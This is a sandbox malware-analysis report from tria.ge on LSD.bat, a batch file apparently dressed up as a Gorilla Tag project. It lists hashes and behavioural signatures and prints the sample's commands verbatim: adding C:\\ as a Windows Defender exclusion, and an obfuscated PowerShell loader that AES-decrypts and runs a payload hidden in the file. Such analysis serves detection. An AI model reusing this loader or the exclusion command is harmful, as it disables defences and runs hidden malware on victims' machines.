Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1Project-LS...in.zip
windows7-x64
1Project-LS...in.zip
windows10-2004-x64
3Project-LS...ICENSE
windows7-x64
1Project-LS...ICENSE
windows10-2004-x64
1Project-LS...SD.zip
windows7-x64
1Project-LS...SD.zip
windows10-2004-x64
1LSD.bat
windows7-x64
8LSD.bat
windows10-2004-x64
10Project-LS...DME.md
windows7-x64
3Project-LS...DME.md
windows10-2004-x64
3Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
25/08/2024, 17:21
Static task
static1
Behavioral task
behavioral1
Sample
Project-LSD-Gorilla-Tag-main.zip
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Project-LSD-Gorilla-Tag-main.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Project-LSD-Gorilla-Tag-main/LICENSE
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Project-LSD-Gorilla-Tag-main/LICENSE
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Project-LSD-Gorilla-Tag-main/LSD.zip
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
Project-LSD-Gorilla-Tag-main/LSD.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
LSD.bat
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
LSD.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Project-LSD-Gorilla-Tag-main/README.md
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
Project-LSD-Gorilla-Tag-main/README.md
Resource
win10v2004-20240802-en
General
-
Target
LSD.bat
-
Size
1.3MB
-
MD5
a9550f1c944a4bce9df986467e8c8065
-
SHA1
da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3
-
SHA256
b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529
-
SHA512
fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca
-
SSDEEP
24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2772 powershell.exe -
Deletes itself 1 IoCs
pid Process 2976 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2544 LSD.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 2976 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2772 powershell.exe 2544 LSD.bat.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2772 powershell.exe Token: SeDebugPrivilege 2544 LSD.bat.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2976 wrote to memory of 3052 2976 cmd.exe 31 PID 2976 wrote to memory of 3052 2976 cmd.exe 31 PID 2976 wrote to memory of 3052 2976 cmd.exe 31 PID 3052 wrote to memory of 2184 3052 net.exe 32 PID 3052 wrote to memory of 2184 3052 net.exe 32 PID 3052 wrote to memory of 2184 3052 net.exe 32 PID 2976 wrote to memory of 2668 2976 cmd.exe 33 PID 2976 wrote to memory of 2668 2976 cmd.exe 33 PID 2976 wrote to memory of 2668 2976 cmd.exe 33 PID 2976 wrote to memory of 2760 2976 cmd.exe 34 PID 2976 wrote to memory of 2760 2976 cmd.exe 34 PID 2976 wrote to memory of 2760 2976 cmd.exe 34 PID 2976 wrote to memory of 2772 2976 cmd.exe 35 PID 2976 wrote to memory of 2772 2976 cmd.exe 35 PID 2976 wrote to memory of 2772 2976 cmd.exe 35 PID 2976 wrote to memory of 2544 2976 cmd.exe 36 PID 2976 wrote to memory of 2544 2976 cmd.exe 36 PID 2976 wrote to memory of 2544 2976 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"1⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org2⤵PID:2668
-
-
C:\Windows\system32\findstr.exefindstr /C:"" blacklist.txt2⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe"LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d